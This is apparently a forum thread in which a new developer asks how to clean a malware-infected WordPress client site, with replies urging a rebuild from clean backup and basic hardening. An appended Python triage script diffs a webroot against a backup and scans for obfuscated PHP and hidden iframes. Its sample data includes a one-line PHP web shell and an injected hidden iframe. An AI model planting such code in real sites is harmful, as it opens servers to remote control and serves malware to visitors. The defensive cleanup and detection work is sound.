I'm a new developer and a client site is infected with malware.
Just registered on the site as I've run into a roadblock and have absolutely no idea what to do. I started learning HTML/CSS/JS about 2 years ago and started "helping"/taking clients to get some experience professionally.
I'm not overly fluent outside basic front end but am capable of using Google/learning. Anyhow, to the point. A site I built that I won't disclose (it's got auto-download JS malware) has been infected.
At first I did a site scan through Sucuri that turned up 3 potential risks. I researched the ones there, did some updates to plugins and CMS versions, and somehow that uncovered 19 more malicious files.
At this point I have no idea what to do. Is it smarter to just advise the client to pay the $120 to one of the online security companies to clean the site, or is there an easier way for me to manage this?
If I'm being unclear, I apologize; I'm still in the middle of learning.
If you have any advice or questions, please let me know.
So that "scan" turned up the names of:
Malware entry: MW:EXPLOITKIT:BLACKHOLE1
Malware entry: MW:JS:160
This is where I started researching like a SOB, found a free copy of virus scan software and removed a Blackhole trojan (Viruses, Cookies, Trojans Quarantined: JS/Exploit-Blacole.eu) from my computer within 2 days of this discovery.
From there I logged into the WordPress dashboard, installed "Anti-Malware by GOTMLS.net" and scanned the site again after doing all the updates to the site.
It is certainly compromised. You will need to restore it from a clean backup. If you don't have one, then unfortunately you need to start from scratch, change your FTP access info and use a freshly made new database with a new username and password.
This is because you have no idea what files have been compromised beyond the files that have been added on.
In future, try to make sure that you use as many security tools as possible to keep your website secure. Use strong passwords.
1) You should be able to find security tools/plugins that will actively deny SQL injections, DDoS attempts and so forth. I've stayed away from WP for quite some time now, so I wouldn't be particularly up to date with these. Other things include .htaccess modifications and password-protecting the admin directory. If you just Google for security tips relating to WordPress you should find a ton of useful sites.
3) It is extremely unlikely the old developer did this. More likely is one or both of two scenarios, not including SQL injection: a) the previous developer was complacent with passwords and security, and/or b) they downloaded the template/plugin from a source other than the author's website, if they used one. Maybe a warez-type website, which will often provide modified templates preloaded with the vulnerability inside.
Due to the vast array of possibilities, there's not much point in clutching at straws, of which there are countless.
Re the side note: most hackers will first try to find out what CMS you are using. The easiest way to get that is either the generator tag, which makes it obvious, or the admin directory. The most popular ones use default settings or cannot be changed, like WordPress/Joomla for instance. They also tend to give the first user a default user ID, the first always being a super admin user. It makes these installations a lot easier to attack with an injection.
As such, it is highly recommended that you add an extra layer of security to these directories or try to limit access however best possible. The redirects I mentioned are useful to make it seem a file or directory does not exist.
I would say that it is best that you start all over.
Common security holes are poorly programmed CMS modules/plugins, usually web forms that don’t do enough security checks on their input. Spammers then usually insert hidden iframes into the site that load the malware. Also, it has been noted that some WordPress themes are compromised or specifically programmed with obfuscated code that could be malware. A good read on this is at http://wpmu.org/why-you-should-never...anywhere-else/.

Another thing that’s good to know is that some malware/spam robots look for characteristic code sequences or text strings in the HTML source code, such as meta tags with a clear indication of which CMS is used, and which version (things like “powered by WordPress” or similar). That way they can easily find out who is using a system with known security holes. So always remove these version notes or any indication of the CMS used, if possible.

That said, I can only agree with evo in that it’s best to remove everything and reinstall from scratch. It should usually suffice to delete all files from the server and clear/delete the database to clean up a webspace (changing all passwords (FTP/database) is advisable, too). If the host’s servers aren’t infected themselves (which we can usually assume they aren’t), that should get rid of any malware that affects your site, because after all, malware is just software and consists of regular files, too.
Also, there are a few security measures you can add with a few .htaccess rules to block known evil scripts, for example.
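The checks the two replies describe, as an added example that is not code from the thread, from either poster, or from WordPress: a small Python triage script that first hashes a clean backup so added files can be told apart from modified originals (evo's point that without a backup you cannot know which files were tampered with), then scans the live copy for the three signs mentioned above, hidden iframes, `eval(base64_decode(...))`-style obfuscated PHP, and a generator meta tag that leaks the CMS version. The sample files, paths, and the `example.invalid` host are constructed for the example, and the regexes are heuristics that flag candidates for manual review; they do not replace the rebuild both replies recommend.

```python
"""Triage helpers for a compromised PHP/WordPress webroot (added example)."""
import hashlib
import re
import tempfile
from pathlib import Path

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
# Attribute/style values that make an injected iframe invisible to a visitor.
HIDDEN_MARKERS = re.compile(
    r"(?:width|height)\s*=\s*[\"']?\s*[01]\b"
    r"|display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|position\s*:\s*absolute\s*;\s*(?:left|top)\s*:\s*-\d+",
    re.I,
)
# eval()/assert()/create_function() wrapped around a decoder is the usual shape
# of obfuscated PHP dropped into themes and plugins. Heuristic: review each hit.
OBFUSCATED_CALL = re.compile(
    r"\b(?:eval|assert|create_function)\s*\(\s*"
    r"(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(",
    re.I,
)
# The generator meta tag advertises the CMS and version to scanning bots.
GENERATOR_TAG = re.compile(
    r"<meta\s+name=[\"']generator[\"']\s+content=[\"']([^\"']+)[\"']", re.I
)
SCANNED_SUFFIXES = {".php", ".html", ".htm", ".js"}


def find_hidden_iframes(html: str) -> list:
    """Return iframe tags sized or styled so the visitor never sees them."""
    return [t for t in IFRAME_TAG.findall(html) if HIDDEN_MARKERS.search(t)]


def find_obfuscated_calls(code: str) -> list:
    """Return eval/assert/create_function calls fed directly by a decoder."""
    return OBFUSCATED_CALL.findall(code)


def generator_banner(html: str):
    """Return the generator meta content (e.g. 'WordPress 3.4.2') or None."""
    m = GENERATOR_TAG.search(html)
    return m.group(1) if m else None


def hash_tree(root: Path) -> dict:
    """Map each file under root (relative, '/'-separated) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*") if p.is_file()
    }


def diff_against_manifest(root: Path, clean: dict) -> dict:
    """Compare a live webroot with a hash manifest taken from a clean backup.
    Only the manifest can reveal 'modified' originals, not just added files."""
    live = hash_tree(root)
    return {
        "added": sorted(set(live) - set(clean)),
        "missing": sorted(set(clean) - set(live)),
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
    }


def scan_tree(root: Path) -> dict:
    """Run the content checks over every PHP/HTML/JS file under root."""
    findings = {}
    for p in root.rglob("*"):
        if not p.is_file() or p.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        text = p.read_text(errors="replace")
        hits = find_hidden_iframes(text) + find_obfuscated_calls(text)
        banner = generator_banner(text)
        if banner:
            hits.append(f"generator tag leaks: {banner}")
        if hits:
            findings[p.relative_to(root).as_posix()] = hits
    return findings


# Constructed sample site: a clean backup, and a live copy with three changes
# (a tampered index.php, a dropped web shell, and an injected hidden iframe).
CLEAN_FILES = {
    "index.php": "<?php\nrequire 'wp-blog-header.php';\n",
    "header.php": '<meta name="generator" content="WordPress 3.4.2" />\n',
}
INFECTED_FILES = dict(CLEAN_FILES)
INFECTED_FILES["index.php"] += 'eval(base64_decode("ZWNobyAnaGknOw=="));\n'
INFECTED_FILES["wp-content/uploads/x.php"] = "<?php eval(gzinflate(base64_decode($_POST['c'])));"
INFECTED_FILES["footer.html"] = (
    '<iframe src="http://example.invalid/go.php" width="1" height="1" '
    'style="visibility:hidden"></iframe>\n'
)


def write_tree(root: Path, files: dict) -> None:
    for rel, content in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(content)


def demo() -> dict:
    """Hash the clean backup, then diff and scan the live copy."""
    with tempfile.TemporaryDirectory() as tmp:
        backup, live = Path(tmp) / "backup", Path(tmp) / "live"
        write_tree(backup, CLEAN_FILES)
        write_tree(live, INFECTED_FILES)
        return {"diff": diff_against_manifest(live, hash_tree(backup)),
                "findings": scan_tree(live)}


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

In practice you would run `hash_tree` against the clean backup (or a fresh download of the same WordPress/plugin/theme versions from their official sources), store the manifest, and feed the live FTP mirror to `diff_against_manifest` and `scan_tree`. Anything in `added` or `modified`, and anything the scanner flags, is what to look at; if there is no clean copy to hash against, the `modified` list is empty by construction, which is exactly why the replies say to rebuild rather than clean.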